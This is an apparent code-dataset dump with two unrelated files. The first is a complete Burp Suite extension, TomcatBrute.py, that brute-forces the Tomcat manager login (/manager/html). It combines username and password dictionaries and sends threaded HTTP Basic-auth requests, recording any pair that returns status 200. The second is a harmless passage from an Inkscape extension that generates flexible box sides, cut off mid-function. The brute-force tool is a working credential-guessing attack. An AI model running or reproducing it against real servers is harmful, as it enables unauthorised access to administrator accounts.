max_stars_repo_path stringlengths 3 269 | max_stars_repo_name stringlengths 4 119 | max_stars_count int64 0 191k | id stringlengths 1 7 | content stringlengths 6 1.05M | score float64 0.23 5.13 | int_score int64 0 5 |
|---|---|---|---|---|---|---|
TomcatBrute.py | WallbreakerTeam/TomcatBrute | 16 | 12767351 | # encoding: utf-8
'''
Created on 2016-9-9
@author: lynn in WallbreakerTeam
'''
from burp import IBurpExtender, ITab
from javax import swing
from java.lang import Short
class BurpExtender(IBurpExtender, ITab):
    '''
    Burp Suite extension (Jython / Python 2) that adds a "TomcatBrute" tab
    used to brute-force the Tomcat manager login (/manager/html) with
    user and password dictionary files.
    '''
    def registerExtenderCallbacks(self, callbacks):
        # Burp entry point: keep the callbacks/helpers, set the extension
        # name, build the Swing form and register the tab.
        self._callbacks = callbacks
        self._helpers = callbacks.getHelpers()
        self._callbacks.setExtensionName('TomcatBrute')
        self._tomcatForceLogin()
        self._initTab(callbacks)
    # Override ITab Method
    def getUiComponent(self):
        # ITab: root Swing component displayed inside the Burp tab.
        return self._toolkitTab
    def getTabCaption(self):
        # ITab: caption text of the Burp tab.
        return 'TomcatBrute'
    # ###########################################################
    # -------------------------------------------------
    def _initTab(self, callbacks):
        '''
        Initial Burp Tab View: wrap the main panel in a tabbed pane and
        register it as a suite tab.
        '''
        self._toolkitTab = swing.JTabbedPane()
        self._toolkitTab.addTab('Tomcat Fs Login', self._tomcatMainPanel)
        callbacks.customizeUiComponent(self._toolkitTab)
        callbacks.addSuiteTab(self)
    # -------------------------------------------------
    def _tomcatForceLogin(self):
        '''
        Build the "Tomcat Force Login" form: URL field, read-only
        username/password dictionary paths, file pickers and
        start/cancel buttons. Uses absolute bounds (no layout manager).
        '''
        self._tomcatMainPanel = swing.JPanel()
        # URL label + editable text field
        self._tomcatMainURLLabel = swing.JLabel('url : ')
        self._tomcatMainURLLabel.setHorizontalAlignment(swing.SwingConstants.CENTER);
        self._tomcatMainURLLabel.setBounds(30, 33, 54, 30);
        self._tomcatMainPanel.add(self._tomcatMainURLLabel);
        self._tomcatMainURL = swing.JTextField()
        self._tomcatMainURL.setBounds(94, 30, 275, 30);
        self._tomcatMainURL.setColumns(10);
        self._tomcatMainPanel.add(self._tomcatMainURL);
        # Username-dictionary path (filled by the 'users' file chooser;
        # not editable by hand)
        self._tomcatMainUnameLabel = swing.JLabel('name : ')
        self._tomcatMainUnameLabel.setHorizontalAlignment(swing.SwingConstants.CENTER);
        self._tomcatMainUnameLabel.setBounds(30, 76, 54, 30);
        self._tomcatMainPanel.add(self._tomcatMainUnameLabel);
        self._tomcatMainUname = swing.JTextField()
        self._tomcatMainUname.setBounds(94, 73, 207, 30);
        self._tomcatMainUname.setColumns(10);
        self._tomcatMainUname.setEditable(False)
        self._tomcatMainPanel.add(self._tomcatMainUname);
        # Password-dictionary path (filled by the 'pwds' file chooser)
        self._tomcatMainPwdLabel = swing.JLabel('pwd : ')
        self._tomcatMainPwdLabel.setHorizontalAlignment(swing.SwingConstants.CENTER);
        self._tomcatMainPwdLabel.setBounds(30, 120, 54, 30);
        self._tomcatMainPanel.add(self._tomcatMainPwdLabel);
        self._tomcatMainPwd = swing.JTextField()
        self._tomcatMainPwd.setBounds(94, 117, 207, 30);
        self._tomcatMainPwd.setColumns(10);
        self._tomcatMainPwd.setEditable(False)
        self._tomcatMainPanel.add(self._tomcatMainPwd);
        # Buttons: load dictionaries, start and cancel
        self._tomcatMainLoadUnames = swing.JButton('users', actionPerformed=self._tomcatLoadUsersFunc)
        self._tomcatMainLoadUnames.setBounds(311, 72, 58, 30);
        self._tomcatMainPanel.add(self._tomcatMainLoadUnames);
        self._tomcatMainLoadPwds = swing.JButton('pwds', actionPerformed=self._tomcatLoadPwdsDicts)
        self._tomcatMainLoadPwds.setBounds(311, 116, 58, 30);
        self._tomcatMainPanel.add(self._tomcatMainLoadPwds);
        self._tomcatMainFsCancel = swing.JButton('cancel', actionPerformed=self._tomcatFsCalcelFunc)
        self._tomcatMainFsCancel.setBounds(275, 167, 93, 23);
        self._tomcatMainPanel.add(self._tomcatMainFsCancel);
        self._tomcatMainFsStart = swing.JButton('start', actionPerformed=self._tomcatFsStartFunc)
        self._tomcatMainFsStart.setBounds(94, 167, 93, 23);
        self._tomcatMainPanel.add(self._tomcatMainFsStart);
        #self._tomcatMainProgressBar = swing.JProgressBar();
        #self._tomcatMainProgressBar.setBounds(11, 222, 358, 20);
        #self._tomcatMainPanel.add(self._tomcatMainProgressBar);
        # Credit labels
        self._tomcatMainAuthorLabel = swing.JLabel('Powdered by lynn')
        self._tomcatMainAuthorLabel.setHorizontalAlignment(swing.SwingConstants.CENTER);
        self._tomcatMainAuthorLabel.setBounds(11, 222, 358, 20);
        self._tomcatMainPanel.add(self._tomcatMainAuthorLabel);
        team = ('team:破壁者').decode("utf8")
        self._tomcatMainTeamLabel = swing.JLabel(team)
        self._tomcatMainTeamLabel.setHorizontalAlignment(swing.SwingConstants.CENTER);
        self._tomcatMainTeamLabel.setBounds(11, 242, 358, 20);
        self._tomcatMainPanel.add(self._tomcatMainTeamLabel);
        # Absolute positioning: disable the default layout manager
        self._tomcatMainPanel.setLayout(None)
    def _tomcatLoadUsersFunc(self, event):
        # 'users' button handler: let the user pick the username dictionary
        # and store its path (backslashes normalised) in the text field.
        chooser = swing.JFileChooser()
        chooser.showOpenDialog(self._tomcatMainPanel)
        filePathName = ''
        try:
            if(chooser.getSelectedFile()) is not None:
                filePathName += (str(chooser.getSelectedFile()).replace('\\', '/'))
                self._tomcatMainUname.setText(filePathName.strip())
        except:
            print 'Open User File Error'
    def _tomcatLoadPwdsDicts(self, event):
        # 'pwds' button handler: same as above for the password dictionary.
        chooser = swing.JFileChooser()
        chooser.showOpenDialog(self._tomcatMainPanel)
        filePathName = ''
        try:
            if(chooser.getSelectedFile()) is not None:
                filePathName += (str(chooser.getSelectedFile()).replace('\\', '/'))
                self._tomcatMainPwd.setText(filePathName.strip())
        except:
            print 'Open Pwd File Error'
    def _tomcatFsCalcelFunc(self, event):
        # 'cancel' button handler: currently only logs; no worker is stopped.
        print '_tomcatFsCalcelFunc'
    def _tomcatFsStartFunc(self, event):
        # 'start' button handler: validate the URL, split host/port and
        # launch the brute force with the two loaded dictionaries.
        if (str(self._tomcatMainURL.getText()).strip()) != '':
            import urllib
            url = str(self._tomcatMainURL.getText().strip())
            if url.startswith('http://') or url.startswith('https://'):
                if not url.endswith('/'):
                    url += '/'
                # Python 2 urllib helpers: scheme / host:port / path split
                proto, rest = urllib.splittype(url)
                host, rest = urllib.splithost(rest)
                host2, port = urllib.splitport(host)
                host = host.split(':')[0]
                if port is None:
                    # NOTE(review): https URLs with no explicit port also fall
                    # back to 80 here — 443 was probably intended for https.
                    port = 80
                usersFile = str(self._tomcatMainUname.getText())
                pwdsFile = str(self._tomcatMainPwd.getText())
                if usersFile != '' and pwdsFile != '':
                    bruter = Bruter(host, port, usersFile, pwdsFile)
                    print bruter.doLogin()
                else:
                    print 'Please load dict files'
            else:
                print 'Check URL'
# ##########################################################
import threading
import time
import httplib
import base64
from collections import deque
results = ''
class TomcatLogin(threading.Thread):
    '''
    Worker thread that tries a single HTTP Basic-auth login against
    /manager/html and appends the credentials to the global `results`
    string when the server answers 200.
    '''
    def __init__(self, host, port, user, password):
        threading.Thread.__init__(self)
        self._host = str(host)
        self._port = str(port)
        self._user = str(user)
        self._password = str(password)
        # Browser-like User-Agent sent with the probe request.
        self._userAgent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36'
    def run(self):
        global results
        # Build the Basic Authorization token; strip the newline that
        # base64.b64encode may embed.
        auth = base64.b64encode('%s:%s' % (self._user, self._password)).replace('\n', '')
        try:
            h = httplib.HTTPConnection(self._host, self._port)
            header = {
                'User-agent':self._userAgent,
                'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
                'Authorization':'Basic %s' % auth
            }
            #print header
            h.request('GET', '/manager/html', headers=header)
            statuscode = h.getresponse().status
            print self._user + ':' + self._password + ';status:' + str(statuscode)
            if statuscode == 200:
                # NOTE(review): `results` is appended from many threads with
                # no lock — concurrent successes could interleave.
                results += 'Username:' + self._user + " Password:" + self._password
            else:
                pass
        except Exception, msg:
            # Network/HTTP failures are only logged; the attempt is skipped.
            print msg
class Bruter():
    '''
    Drives the brute force: builds the cartesian product of the username
    and password dictionaries and spawns one TomcatLogin thread per pair.
    '''
    def __init__(self, host, port, userFile, pwdFile):
        self.host = host
        self.port = port
        # Paths of the dictionary files (one entry per line).
        self.userFile = userFile
        self.pwdFile = pwdFile
    def doLogin(self):
        # Returns the global `results` string filled in by the workers.
        global results
        USERNAMEs = [p.replace('\n', '') for p in open(self.userFile, 'r').readlines()]
        PASSWORDs = [p.replace('\n', '') for p in open(self.pwdFile, 'r').readlines()]
        # Queue of (username, password) pairs to try.
        accounts = deque()
        for username in USERNAMEs:
            for password in PASSWORDs:
                accounts.append((username, password))
        for acc in range(len(accounts)):
            worker = TomcatLogin(self.host, self.port, accounts[acc][0], accounts[acc][1])
            worker.setDaemon(True)
            worker.start()
            # Throttle thread creation a little between attempts.
            time.sleep(0.1)
        # NOTE(review): the workers are never join()ed, so late successes
        # may not be in `results` when this returns.
        #if results == '':
        #results = 'Brute Failed'
        return results
| 1.882813 | 2 |
Drawbotextension/KM-Laser-master/km_box_flexpath.py | fabloch/DrawbotInkscapeExtensions | 0 | 12767352 | <gh_stars>0
#!/usr/bin/env python3
# paths2flex.py
# This is an Inkscape extension to generate boxes with sides as flex which follow a path selected in inkscape
# The Inkscape objects must first be converted to paths (Path > Object to Path).
# Some paths may not work well -- if the curves are too small for example.
# Written by <NAME> (<EMAIL>), december 2018
# This work is largely inspred from path2openSCAD.py, written by <NAME>
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
import math
import os.path
import inkex
import re
from lxml import etree
from inkex import bezier
from inkex.paths import Path, CubicSuperPath
# Fallback drawing size used to seed the centre coordinates (cx, cy)
# in Path2Flex.__init__ before real bounds are computed.
DEFAULT_WIDTH = 100
DEFAULT_HEIGHT = 100
# Stroke style for generated cut paths: hairline black, no fill.
objStyle = str(inkex.Style(
    {'stroke': '#000000',
    'stroke-width': 0.1,
    'fill': 'none'
    }))
# Stroke style used by GenPathStart to highlight the start path in red.
objStyleStart = str(inkex.Style(
    {'stroke': '#FF0000',
    'stroke-width': 0.1,
    'fill': 'none'
    }))
class inkcape_draw_cartesian:
    """Accumulate an SVG path-data string in Cartesian coordinates.

    Every coordinate is shifted by the offset given at construction time
    and rounded to 3 decimals before being appended to the path data.
    """

    def __init__(self, Offset, group):
        self.offsetX = Offset[0]
        self.offsetY = Offset[1]
        self.Path = ''
        self.group = group

    def _fmt(self, x, y):
        # Apply the offset, round to 3 decimals and return an "x,y" token.
        return str(round(x - self.offsetX, 3)) + ',' + str(round(y - self.offsetY, 3))

    def MoveTo(self, x, y):
        """Append an absolute move-to command at (x, y)."""
        self.Path += ' M ' + self._fmt(x, y)

    def LineTo(self, x, y):
        """Append an absolute line-to command towards (x, y)."""
        self.Path += ' L ' + self._fmt(x, y)

    def Line(self, x1, y1, x2, y2):
        """Append a detached segment: move to (x1, y1) then line to (x2, y2)."""
        self.Path += ' M ' + self._fmt(x1, y1) + ' L ' + self._fmt(x2, y2)

    def GenPath(self):
        """Emit the accumulated path as an SVG element with the normal style."""
        attribs = {'style': objStyle, 'd': self.Path}
        etree.SubElement(self.group, inkex.addNS('path', 'svg'), attribs)

    def GenPathStart(self):
        """Emit the accumulated path with the highlighted 'start' style."""
        attribs = {'style': objStyleStart, 'd': self.Path}
        etree.SubElement(self.group, inkex.addNS('path', 'svg'), attribs)
class Line:
    """A 2-D line stored in implicit form: a*x + b*y + c = 0."""

    def __init__(self, a, b, c):
        self.a = a
        self.b = b
        self.c = c

    def __str__(self):
        return f"Line a={self.a} b={self.b} c={self.c}"

    def Intersect(self, Line2):
        '''Return the intersection point of the two lines, or None when
        they are (nearly) parallel.'''
        det = Line2.a * self.b - self.a * Line2.b
        if abs(det) < 1e-6:
            # Parallel (or identical) lines: no unique intersection.
            return None
        x = (Line2.b * self.c - Line2.c * self.b) / det
        y = (self.a * Line2.c - Line2.a * self.c) / det
        return (x, y)

    def square_line_distance(self, pt):
        '''
        Squared distance between the point pt = (x, y) and this line:
        (a*x + b*y + c)^2 / (a^2 + b^2).
        '''
        residual = self.a * pt[0] + self.b * pt[1] + self.c
        return residual * residual / (self.a * self.a + self.b * self.b)
class Segment(Line):
    """A line segment from A to B.

    Carries the implicit-line coefficients (via Line) plus the segment's
    axis-aligned bounding box, used by InSegment to reject points that
    cannot lie on the segment.
    """
    def __init__(self, A, B):
        self.xA = A[0]
        self.xB = B[0]
        self.yA = A[1]
        self.yB = B[1]
        # Bounding box of the segment.
        self.xm = min(self.xA, self.xB)
        self.xM = max(self.xA, self.xB)
        self.ym = min(self.yA, self.yB)
        self.yM = max(self.yA, self.yB)
        Line.__init__(self, A[1] - B[1], B[0] - A[0], A[0] * B[1] - B[0] * A[1])
    def InSegment(self, Pt):
        """Return 1 if Pt lies within the segment's bounding box, else 0.

        Callers are expected to have already established that Pt is on
        the supporting line; this only checks the box.
        """
        if Pt[0] < self.xm or Pt[0] > self.xM:
            return 0 # Impossible lower than xmin or greater than xMax
        if Pt[1] < self.ym or Pt[1] > self.yM:
            return 0 # Impossible lower than ymin or greater than yMax
        return 1
    def __str__(self):
        # BUG FIX: a second, earlier __str__ referenced the undefined names
        # A and B (NameError if called) and was shadowed by this definition
        # anyway; the dead duplicate has been removed.
        return "Seg"+str([(self.xA, self.yA), (self.xB, self.yB)])+" Line a="+str(self.a)+" b="+str(self.b)+" c="+str(self.c)
def pointInBBox(pt, bbox):
    '''
    Determine if the point pt=[x, y] lies on or within the bounding
    box bbox=[xmin, xmax, ymin, ymax].
    '''
    x, y = pt[0], pt[1]
    # Inclusive on all four edges.
    return (bbox[0] <= x <= bbox[1]) and (bbox[2] <= y <= bbox[3])
def bboxInBBox(bbox1, bbox2):
    '''
    Determine if the bounding box bbox1 lies on or within the
    bounding box bbox2. NOTE: we do not test for strict enclosure.
    Structure of the bounding boxes is
    bbox1 = [ xmin1, xmax1, ymin1, ymax1 ]
    bbox2 = [ xmin2, xmax2, ymin2, ymax2 ]
    '''
    # Containment (non-strict) on each axis.
    x_inside = (bbox2[0] <= bbox1[0]) and (bbox1[1] <= bbox2[1])
    y_inside = (bbox2[2] <= bbox1[2]) and (bbox1[3] <= bbox2[3])
    return x_inside and y_inside
def pointInPoly(p, poly, bbox=None):
    '''
    Use a ray casting algorithm to see if the point p = [x, y] lies within
    the polygon poly = [[x1,y1],[x2,y2],...]. Returns True if the point
    is within poly, lies on an edge of poly, or is a vertex of poly.

    The optional bbox=[xmin, xmax, ymin, ymax] allows a fast rejection
    before the per-edge work.
    '''
    if (p is None) or (poly is None):
        return False
    # Check to see if the point lies outside the polygon's bounding box
    if not bbox is None:
        if not pointInBBox(p, bbox):
            return False
    # Check to see if the point is a vertex
    if p in poly:
        return True
    # Handle a boundary case associated with the point
    # lying on a horizontal edge of the polygon
    x = p[0]
    y = p[1]
    p1 = poly[0]
    p2 = poly[1]
    for i in range(len(poly)):
        if i != 0:
            p1 = poly[i-1]
            p2 = poly[i]
        # Point strictly between the endpoints of a horizontal edge.
        if (y == p1[1]) and (p1[1] == p2[1]) and \
           (x > min(p1[0], p2[0])) and (x < max(p1[0], p2[0])):
            return True
    # Standard ray cast: count edge crossings of a horizontal ray from p.
    n = len(poly)
    inside = False
    p1_x,p1_y = poly[0]
    for i in range(n + 1):
        # i % n wraps so the closing edge (last vertex -> first) is tested.
        p2_x,p2_y = poly[i % n]
        if y > min(p1_y, p2_y):
            if y <= max(p1_y, p2_y):
                if x <= max(p1_x, p2_x):
                    if p1_y != p2_y:
                        # x of the edge at height y
                        intersect = p1_x + (y - p1_y) * (p2_x - p1_x) / (p2_y - p1_y)
                        if x <= intersect:
                            inside = not inside
                    else:
                        inside = not inside
        p1_x,p1_y = p2_x,p2_y
    return inside
def polyInPoly(poly1, bbox1, poly2, bbox2):
    '''
    Determine if polygon poly2 = [[x1,y1],[x2,y2],...]
    contains polygon poly1.
    The bounding box information, bbox=[xmin, xmax, ymin, ymax]
    is optional. When supplied it can be used to perform rejections.
    Note that one bounding box containing another is not sufficient
    to imply that one polygon contains another. It's necessary, but
    not sufficient.
    '''
    # Fast rejection: if poly1's bbox is not inside poly2's bbox,
    # poly1 cannot be contained by poly2.
    if (bbox1 is not None) and (bbox2 is not None):
        if not bboxInBBox(bbox1, bbox2):
            return False
    # Containment requires every vertex of poly1 to lie on or in poly2.
    return all(pointInPoly(p, poly2, bbox2) for p in poly1)
def subdivideCubicPath(sp, flat, i=1):
    '''
    [ Lifted from eggbot.py with impunity ]
    Break up a bezier curve into smaller curves, each of which
    is approximately a straight line within a given tolerance
    (the "smoothness" defined by [flat]).
    This is a modified version of cspsubdiv.cspsubdiv(): rewritten
    because recursion-depth errors on complicated line segments
    could occur with cspsubdiv.cspsubdiv().

    Mutates the cubic-super-path node list *sp* in place.
    '''
    while True:
        while True:
            if i >= len(sp):
                return
            # Control points of the current cubic segment
            # (previous node's anchor/handle, this node's handle/anchor).
            p0 = sp[i - 1][1]
            p1 = sp[i - 1][2]
            p2 = sp[i][0]
            p3 = sp[i][1]
            b = (p0, p1, p2, p3)
            # Not flat enough yet: break out to split it.
            if bezier.maxdist(b) > flat:
                break
            i += 1
        # Split the segment at t=0.5 and splice the midpoint node into sp;
        # the outer loop then re-tests both halves.
        one, two = bezier.beziersplitatt(b, 0.5)
        sp[i - 1][2] = one[1]
        sp[i][0] = two[2]
        p = [one[2], one[3], two[1]]
        # sp[i:1] is an empty slice for i >= 1, so this inserts p at index i.
        sp[i:1] = [p]
# Second degree equation solver.
# Return a tuple with the two real solutions, or None if there is no real solution.
def Solve2nd(a, b, c):
    """Solve a*x**2 + b*x + c = 0 over the reals.

    Returns (x1, x2) where x1 uses the +sqrt branch, or None when the
    discriminant is negative (no real solution). A double root is
    returned as two equal values.
    """
    delta = b**2 - 4*a*c
    if (delta < 0):
        print("No real solution")
        # BUG FIX: previously `return none` — an undefined name that raised
        # NameError instead of signalling "no solution" with None.
        return None
    x1 = (-b + math.sqrt(delta))/(2*a)
    x2 = (-b - math.sqrt(delta))/(2*a)
    return (x1, x2)
# Euclidean distance between the points (x0, y0) and (x1, y1).
def distance2points(x0, y0, x1, y1):
    dx = x0 - x1
    dy = y0 - y1
    return math.hypot(dx, dy)
class Path2Flex(inkex.Effect):
def __init__(self):
    """Register the extension's CLI options and initialise state."""
    inkex.Effect.__init__(self)
    self.knownUnits = ['in', 'pt', 'px', 'mm', 'cm', 'm', 'km', 'pc', 'yd', 'ft']
    self.arg_parser.add_argument('--unit', default = 'mm', help = 'Unit, should be one of ')
    self.arg_parser.add_argument('--thickness', type = float, default = '3.0', help = 'Material thickness')
    self.arg_parser.add_argument('--zc', type = float, default = '50.0', help = 'Flex height')
    self.arg_parser.add_argument('--notch_interval', type = int, default = '2', help = 'Interval between notches')
    self.arg_parser.add_argument('--max_size_flex', type = float, default = '1000.0', help = 'Max size of a single band of flex, above this limit it will be cut')
    self.arg_parser.add_argument('--Mode_Debug', type = inkex.Boolean, default = 'false', help = 'Output Debug information in file')
    # Dictionary of paths we will construct. It's keyed by the SVG node
    # it came from. Such keying isn't too useful in this specific case,
    # but it can be useful in other applications when you actually want
    # to go back and update the SVG document
    self.paths = {}
    # Per-notch flags consulted by the flex generators: a 0 entry
    # suppresses the short flex cuts for that notch index.
    self.flexnotch = []
    # Debug Output file
    self.fDebug = None
    # Dictionary of warnings issued. This to prevent from warning
    # multiple times about the same problem
    self.warnings = {}
    #Get bounding rectangle
    # Sentinels: any real coordinate will replace these extremes.
    self.xmin, self.xmax = (1.0E70, -1.0E70)
    self.ymin, self.ymax = (1.0E70, -1.0E70)
    # Drawing-centre defaults derived from the fallback canvas size.
    self.cx = float(DEFAULT_WIDTH) / 2.0
    self.cy = float(DEFAULT_HEIGHT) / 2.0
def unittouu(self, unit):
    # Convert a dimension string (e.g. '10mm') to user units.
    # NOTE(review): delegates to a module-level inkex.unittouu; in recent
    # inkex releases this helper lives on self.svg.unittouu — confirm
    # against the targeted Inkscape/inkex version.
    return inkex.unittouu(unit)
def DebugMsg(self, s):
    """Write *s* to the debug trace file, when one has been opened."""
    if not self.fDebug:
        return
    self.fDebug.write(s)
# Generate the long vertical cut lines that make the material flexible.
# StartX/StartY: origin of the first line; Size: line length; nLine: count;
# UpDown: +1 to step towards increasing Y, -1 towards decreasing Y.
def GenLinesFlex(self, StartX, StartY, Size, nLine, UpDown, path):
    y = StartY
    for _ in range(nLine):
        path.Line(StartX, y, StartX, y + UpDown*Size)
        self.DebugMsg("GenLinesFlex from "+str((StartX, y))+" to "+str((StartX, y + UpDown*Size))+'\n')
        # Leave a 2-unit bridge between consecutive cuts.
        y += UpDown*(Size+2)
# Generate the path link to a flex step
#
def generate_step_flex(self, step, size_notch, ShortMark, LongMark, nMark, index):
    '''
    Draw one repeating flex step (notch number *step* of the band): the
    notches cut into the top and bottom edges plus the vertical flex cuts.
    '''
    path = inkcape_draw_cartesian(self.OffsetFlex, self.group)
    #External part of the notch, fraction of total notch
    notch_useful = 2.0 / (self.notchesInterval + 2)
    # First, link towards next step
    # Line from ((step+1)*size_notch, 0) to ((step+0.5)*size_notch, 0
    path.Line((step+1)*size_notch, 0, (step+notch_useful)*size_notch, 0)
    if self.flexnotch[index] == 0:
        # This notch gets no flex cuts: zero the short-mark length.
        ShortMark = 0
    # Then ShortLine from ((step+notch_useful)*size_notch, ShortMark) towards ((step+notch_useful)*size_notch, -Thickness)
    path.Line((step+notch_useful)*size_notch, ShortMark,(step+notch_useful)*size_notch, -self.thickness)
    # Then notch
    path.LineTo(step*size_notch, -self.thickness)
    # Then short mark towards other side (step*size_notch, shortmark)
    path.LineTo(step*size_notch, ShortMark)
    if ShortMark != 0: #Only if there is flex
        # Then line towards center
        self.GenLinesFlex(step*size_notch, ShortMark + 2, (self.height - 2*ShortMark - 2.0)/(nMark-1) - 2.0, nMark-1, 1, path)
    # Then notch
    path.Line(step*size_notch, self.height - ShortMark, step*size_notch, self.height + self.thickness)
    path.LineTo((step+notch_useful)*size_notch, self.height + self.thickness)
    path.LineTo((step+notch_useful)*size_notch, self.height - ShortMark)
    if ShortMark != 0:
        #Then nMark-1 Lines
        self.GenLinesFlex((step+notch_useful)*size_notch, self.height - ShortMark - 2, (self.height - 2*ShortMark - 2.0)/(nMark-1) - 2.0, nMark-1, -1, path)
        #Then Long lines internal to notch
        self.GenLinesFlex((step+notch_useful/2)*size_notch, 1 - self.thickness, (self.height + 2.0*self.thickness)/nMark - 2, nMark, 1, path)
    # link towards next One
    path.Line((step+notch_useful)*size_notch, self.height, (step+1)*size_notch, self.height)
    if ShortMark != 0:
        # notchesInterval *nMark Long lines up to next notch or 2 shorts and nMark-1 long
        i = 1
        while i < self.notchesInterval:
            pos = (i + 2.0) / (self.notchesInterval + 2.0)
            if i % 2 :
                #odd draw from bottom to top, nMark lines
                self.GenLinesFlex((step+pos)*size_notch, self.height - 1, self.height /nMark - 2.0, nMark, -1, path)
            else:
                # even draw from top to bottom nMark+1 lines, 2 short and nMark-1 Long
                path.Line((step+pos)*size_notch, 3, (step+pos)*size_notch, ShortMark)
                self.GenLinesFlex((step+pos)*size_notch, ShortMark + 2, (self.height - 2*ShortMark - 2.0)/(nMark-1) - 2.0, nMark-1, 1, path)
                path.Line((step+pos)*size_notch, self.height - ShortMark, (step+pos)*size_notch, self.height - 3)
            i += 1
    # Write path to inkscape
    path.GenPath()
def GenerateStartFlex(self, size_notch, ShortMark, LongMark, nMark, index):
    '''
    Draw the start pattern
    The notch is only 1 mm wide, to enable putting both start and end notch in the same hole in the cover
    '''
    path = inkcape_draw_cartesian(self.OffsetFlex, self.group)
    #External part of the notch, fraction of total notch
    notch_useful = 1.0 / (self.notchesInterval + 2)
    notch_in = self.notchesInterval / (self.notchesInterval + 2.0)
    # First, link towards next step
    # Line from (, 0) to 0, 0
    path.Line(-notch_in*size_notch, 0, 0, 0)
    if self.flexnotch[index] == 0:
        # First notch gets no flex cuts.
        ShortMark = 0
    # Then ShortLine from (-notch_in*size_notch, ShortMark) towards -notch_in*size_notch, Thickness)
    path.Line(-notch_in*size_notch, ShortMark, -notch_in*size_notch, -self.thickness)
    # Then notch (beware, only size_notch/4 here)
    path.LineTo((notch_useful-1)*size_notch, -self.thickness)
    # Then edge, full length
    path.LineTo((notch_useful-1)*size_notch, self.height+self.thickness)
    # Then notch
    path.LineTo(-notch_in*size_notch, self.height + self.thickness)
    path.LineTo(-notch_in*size_notch, self.height - ShortMark + 1)
    if ShortMark != 0:
        #Then nMark - 1 Lines
        self.GenLinesFlex(-notch_in*size_notch, self.height - ShortMark - 2, (self.height - 2*ShortMark - 2.0)/(nMark-1) - 2.0, nMark-1, -1, path)
    # link towards next One
    path.Line(-notch_in*size_notch, self.height, 0, self.height)
    if ShortMark != 0:
        # notchesInterval *nMark Long lines up to next notch or 2 shorts and nMark-1 long
        i = 1
        while i < self.notchesInterval:
            pos = (i - self.notchesInterval) / (self.notchesInterval + 2.0)
            if i % 2 :
                #odd draw from bottom to top, nMark lines
                self.GenLinesFlex(pos*size_notch, self.height - 1, self.height /nMark - 2.0, nMark, -1, path)
            else:
                # even draw from top to bottom nMark+1 lines, 2 short and nMark-1 Long
                path.Line(pos*size_notch, 3, pos*size_notch, ShortMark)
                self.GenLinesFlex(pos*size_notch, ShortMark + 2, (self.height - 2*ShortMark - 2.0)/(nMark-1) - 2.0, nMark-1, 1, path)
                path.Line(pos*size_notch, self.height - ShortMark, pos*size_notch, self.height - 3)
            i += 1
    path.GenPath()
def GenerateEndFlex(self, step, size_notch, ShortMark, LongMark, nMark, index):
    '''
    Draw the end pattern of a flex band: a narrow closing notch plus the
    final edge and, when enabled, the last column of flex cuts.
    '''
    path = inkcape_draw_cartesian(self.OffsetFlex, self.group)
    # Width fraction of the narrow closing notch.
    delta_notch = 1.0 / (self.notchesInterval + 2.0)
    if self.flexnotch[index] == 0:
        # No flex cuts for this notch.
        ShortMark = 0
    # ShortLine from (step*size_notch, ShortMark) towards step*size_notch, -Thickness)
    path.Line(step*size_notch, ShortMark, step*size_notch, -self.thickness)
    # Then notch (beware, only 1mm here)
    path.LineTo((step+delta_notch)*size_notch, -self.thickness)
    # Then edge, full length
    path.LineTo((step+delta_notch)*size_notch, self.height+self.thickness)
    # Then notch
    path.LineTo(step*size_notch, self.height + self.thickness)
    path.LineTo(step*size_notch, self.height - ShortMark)
    if ShortMark != 0:
        #Then nMark - 1 Lines
        self.GenLinesFlex(step*size_notch, self.height - ShortMark - 2, (self.height - 2*ShortMark - 2.0)/(nMark-1) - 2.0, nMark-1, -1, path)
    path.GenPath()
def GenFlex(self, parent, num_notch, size_notch, xOffset, yOffset):
    '''
    Generate the whole flex structure: one or more bands (each at most
    max_flex_size long), each made of a start pattern, repeated steps
    and an end pattern.
    '''
    group = etree.SubElement(parent, 'g')
    self.group = group
    #Compute number of vertical lines. Each long mark should be at most 50mm long to avoid failures
    nMark = int(self.height / 50) + 1
    nMark = max(nMark, 2) # At least 2 marks
    #Then compute number of flex bands
    FlexLength = num_notch * size_notch
    nb_flex_band = int (FlexLength // self.max_flex_size) + 1
    # NOTE(review): true division — notch_per_band is a float in Python 3;
    # integer division (//) may have been intended when porting from
    # Python 2. The float also propagates into num_notch below.
    notch_per_band = num_notch / nb_flex_band + 1
    self.DebugMsg("Generate flex structure with "+str(nb_flex_band)+" bands, "+str(num_notch)+" notches, offset ="+str((xOffset, yOffset))+'\n')
    #Sizes of short and long lines to make flex
    LongMark = (self.height / nMark) - 2.0 #Long Mark equally divide the height
    ShortMark = LongMark/2 # And short mark should lay at center of long marks
    idx_notch = 0
    while num_notch > 0:
        self.OffsetFlex = (xOffset, yOffset)
        self.GenerateStartFlex(size_notch, ShortMark, LongMark, nMark, idx_notch)
        idx_notch += 1
        notch = 0
        if notch_per_band > num_notch:
            notch_per_band = num_notch #for the last one
        while notch < notch_per_band - 1:
            self.generate_step_flex(notch, size_notch, ShortMark, LongMark, nMark, idx_notch)
            notch += 1
            idx_notch += 1
        num_notch -= notch_per_band
        if num_notch == 0:
            self.GenerateEndFlex(notch, size_notch, ShortMark, LongMark, nMark, 0)
        else:
            self.GenerateEndFlex(notch, size_notch, ShortMark, LongMark, nMark, idx_notch)
        # Next band is drawn to the left of the previous one.
        xOffset -= size_notch * notch_per_band + 10
def getPathVertices(self, path, node=None):
    '''
    Decompose the path data from an SVG element into individual
    subpaths, each subpath consisting of absolute move to and line
    to coordinates. Place these coordinates into a list of polygon
    vertices.

    Side effects: stores the list of subpath polygons in self.paths[node]
    and widens the drawing bounds (self.xmin/xmax/ymin/ymax).
    '''
    self.DebugMsg("Entering getPathVertices, len="+str(len(path))+"\n")
    if (not path) or (len(path) == 0):
        # Nothing to do
        return None
    # parsePath() may raise an exception. This is okay
    simple_path = Path(path).to_arrays()
    if (not simple_path) or (len(simple_path) == 0):
        # Path must have been devoid of any real content
        return None
